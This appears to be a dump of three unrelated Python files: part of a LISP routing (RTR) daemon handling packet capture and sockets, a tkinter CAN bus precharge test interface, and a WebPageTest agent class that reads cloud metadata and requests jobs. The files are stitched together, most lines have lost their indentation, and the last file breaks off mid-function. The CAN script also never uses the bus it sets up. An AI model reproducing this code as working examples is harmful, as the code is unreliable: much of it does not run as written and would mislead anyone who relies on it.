# main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
if (lisp_triage(parms[1]) == False): return
device = parms[0]
lisp_thread = parms[1]
use_workers = lisp_thread.number_of_worker_threads
lisp_thread.input_stats.increment(len(packet))
#
    # Strip the link-layer header: 4 bytes for the loopback (null) header,
    # 14 bytes for an Ethernet header on macOS, or 16 bytes for the Linux
    # cooked capture used with the "any" device.
#
offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[offset::]
#
# If we are using worker threads, queue packet so they can process packet.
#
if (use_workers):
index = lisp_thread.input_stats.packet_count % use_workers
index = index + (len(lisp_threads) - use_workers)
thread = lisp_threads[index]
thread.input_queue.put(packet)
else:
lisp_thread.lisp_packet.packet = packet
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endif
return
#enddef
#
# lisp_rtr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_rtr_pcap_thread(lisp_thread):
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 9000, 0, 100)
#
# If "lisp-nat = yes" is configured, then a PETR is co-located with this
# RTR functionality. We need to pcap *all* packets (0.0.0.0/0 and 0::/0).
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
pfilter = "(dst host "
afilter = ""
for addr in lisp.lisp_get_all_addresses():
pfilter += "{} or ".format(addr)
afilter += "{} or ".format(addr)
    #endfor
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0))))"
#
# For RLOC-probe messages that come via pcap interface so we have the
# IP header to grab the TTL.
#
afilter = afilter[0:-4]
pfilter += (" or (not (src host {}) and " + \
"((udp src port 4342 and ip[28] == 0x28) or " + \
"(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)
if (lisp_nat):
pfilter += " or (dst net 0.0.0.0/0 and not (host {}))".format(afilter)
#endif
lisp.lprint("Capturing packets for: '{}'".format(pfilter))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
return
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer():
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce.clear()
lisp.lisp_crypto_keys_by_nonce = {}
#
# Walk map-cache.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Clear the LISP-Trace cache so we can optimize memory usage. There is only
# a one-time use for the cahced entries.
#
lisp.lisp_rtr_nat_trace_cache.clear()
lisp.lisp_rtr_nat_trace_cache = {}
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_rtr_startup
#
# Initialize this LISP RTR process. This function returns no values.
#
def lisp_rtr_startup():
global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
global lisp_ipc_punt_socket, lisp_trace_listen_socket
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open network send socket and internal listen socket. For an RTR, that
# may be behind a NAT, all Map-Requests are sent with the ephemeral port
# so the Map-Request port and the ECM port will be the same.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[0] = lisp_ephem_listen_socket
# lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
    # ETRs as well. All other components use an array of size 3.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open up a listen socket on the LISP-Trace port so the RTR can cache
# translated RLOC information from an ltr client program.
#
lisp_trace_listen_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp.LISP_TRACE_PORT))
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
pcap_threads = os.getenv("LISP_PCAP_THREADS")
pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
worker_threads = os.getenv("LISP_WORKER_THREADS")
worker_threads = 0 if (worker_threads == None) else int(worker_threads)
#
# Setup packet capture.
#
for i in range(pcap_threads):
t = lisp.lisp_thread("pcap-{}".format(i))
t.thread_number = i
t.number_of_pcap_threads = pcap_threads
t.number_of_worker_threads = worker_threads
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
    #endfor
#
# Start worker threads. If you want to change the number of them, only
# this constant needs changing.
#
for i in range(worker_threads):
t = lisp.lisp_thread("worker-{}".format(i))
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
#endfor
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-rtr")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_trace_listen_socket, "")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
lisp_raw_socket.close()
return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Trigger if "rloc-probing = yes" just happened and it was previously
# set to "no".
#
if (rloc_probing == False and lisp.lisp_rloc_probing):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
None, lisp_raw_socket]
lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# RTR commands processed by this process.
#
lisp_rtr_commands = {
"lisp xtr-parameters" : [lisp_rtr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_rtr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp database-mapping" : [lisp_rtr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp glean-mapping" : [lisp_rtr_glean_mapping_command, {
"instance-id" : [False],
"eid-prefix" : [True],
"rloc-prefix" : [True],
"rloc-probe" : [True, "yes", "no"] }],
"show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
"show rtr-keys" : [lisp_rtr_show_keys_command, {}],
"show rtr-map-cache" : [lisp_rtr_show_command, {}],
"show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
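#
# Format of the table above (inferred from the entries themselves, shown here
# only as an illustration): each clause name maps to [command-handler,
# {keyword : [value-expected, lower-bound, upper-bound]}] or, for boolean
# keywords, [value-expected, "yes", "no"]. For example,
# "instance-id" : [True, 0, 0xffffffff] means the keyword takes a value
# between 0 and 0xffffffff. lispconfig.lisp_process_command(), called from
# the main loop below, is handed this table when a command arrives on the
# IPC socket.
#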
#
# lisp_rtr_process_trace_packet
#
# Process RLOC-based LISP-Trace message.
#
def lisp_rtr_process_trace_packet(lisp_socket):
#
# Read from listen socket for port 2434 and parse LISP-Trace packet.
#
opcode, source, port, packet = lisp.lisp_receive(lisp_socket, False)
trace = lisp.lisp_trace()
if (trace.decode(packet) == False): return
#
# Cache the translated information. Will use local addressing info to
# find translated information in lisp_trace_append().
#
trace.rtr_cache_nat_trace(source, port)
#enddef
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_rtr_startup() == False):
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ipc_punt_socket, lisp_trace_listen_socket]
ephem_sockets = [lisp_ephem_listen_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# LISP-TRACE messages coming from an ltr client program.
#
if (lisp_trace_listen_socket in ready_list):
lisp_rtr_process_trace_packet(lisp_trace_listen_socket)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-rtr", [lisp_rtr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_rtr_data_plane(packet, "")
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
test_precharge_interface.py
|
import tkinter as tk
import can
import time
import threading
# https://realpython.com/python-gui-tkinter/
# CANBUS SPEED
CANBUS_SPEED = 500000
# CANBUS ADDRESSES
THROTTLE_CONTROLLER_PERIPHERAL_ID = 0x343
ORION_BMS_STATUS_ID = 0x180
# INTERFACE OBJECTS
window = tk.Tk()
greeting = tk.Label(text="TS_21 ELECTRICAL TEST INTERFACE")
# State flags set by the buttons and read by throttle_interface()
precharge_state = tk.IntVar(master=window, value=0)
drive_state = tk.IntVar(master=window, value=0)
precharge_button = tk.Button(
    text="PRECHARGE",
    bg = "red",
    fg = "white",
    command = lambda: precharge_state.set(1)
)
drive_button = tk.Button(
    text="DRIVE",
    bg = "green",
    fg = "white",
    command = lambda: drive_state.set(1)
)
def send_handler(bus, msg):
try:
bus.send(msg,timeout=None)
print(msg.data)
print("Message sent on {}\r".format(bus.channel_info))
except:
print("Message not sent")
def throttle_interface(bus):
    # DEFAULT PERIPHERAL PAYLOAD
    payload = [0,0,0,0,0,0,0,0]
    if (precharge_state.get()):
        payload[0] = 1
    if (drive_state.get()):
        payload[1] = 1
    msg = can.Message(arbitration_id=THROTTLE_CONTROLLER_PERIPHERAL_ID, data=payload)
    send_handler(bus, msg)
    time.sleep(1)
def orion_interface(bus):
payload = [7,0,0,0,0,0,0,0]
msg = can.Message(arbitration_id=ORION_BMS_STATUS_ID, data=payload)
send_handler(bus, msg)
time.sleep(0.2)
def setup_canbus():
# may need to add serial=12093 <- or whatever number that is.
    bus = can.interface.Bus(bustype='kvaser', channel=0, bitrate=CANBUS_SPEED)
print(bus.get_stats())
bus.flash(flash=True)
return bus
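# Bench-testing sketch (assumption: no Kvaser hardware attached): python-can
# ships a virtual interface that can stand in for the Kvaser bus so the rest
# of this test interface can be exercised without hardware.
def setup_virtual_canbus():
    return can.interface.Bus(bustype='virtual', channel='test_channel', bitrate=CANBUS_SPEED)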
def manage_window():
greeting.pack()
precharge_button.pack()
drive_button.pack()
window.mainloop()
try:
    threading.Thread(target=setup_canbus).start()
    threading.Thread(target=manage_window).start()
except:
    print("Error! Cannot start new thread")
while 1:
    time.sleep(1)
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import multiprocessing
import os
import platform
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1)
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
try:
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
except Exception:
pass
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '19.04'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
                    self.version = git_date.strftime('%y%m%d.%H%M%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
# 106k iterations takes ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
        # The Windows AMIs use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
# Make sure the route blocking isn't configured on Linux
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'delete', '169.254.169.254'])
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
# Block access to the metadata server
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'add', '169.254.169.254', 'gw', '127.0.0.1', 'lo'])
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
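    # Example of the user-data format consumed by parse_user_data() above
    # (the values are placeholders): a whitespace-separated list of key=value
    # pairs such as
    #   "wpt_server=wpt.example.com wpt_loc=Test wpt_key=abc123 wpt_fps=30"
    # which would set self.url, self.test_locations/self.location, self.key
    # and self.fps respectively.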
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
                    if 'type' not in job:
                        job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if 'warmup' not in job:
job['warmup'] = 0
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['lighthouse_throttle'] = \
bool('lighthouseThrottle' in job and job['lighthouseThrottle'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and
'disable_video' in job and
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
                    if 'throttle_cpu' in job:
                        throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
                        throttle *= self.cpu_scale_multiplier
                        job['throttle_cpu_requested'] = job['throttle_cpu']
                        job['throttle_cpu'] = throttle
                    # Discard jobs that are missing the required fields
                    if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
                        job = None
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
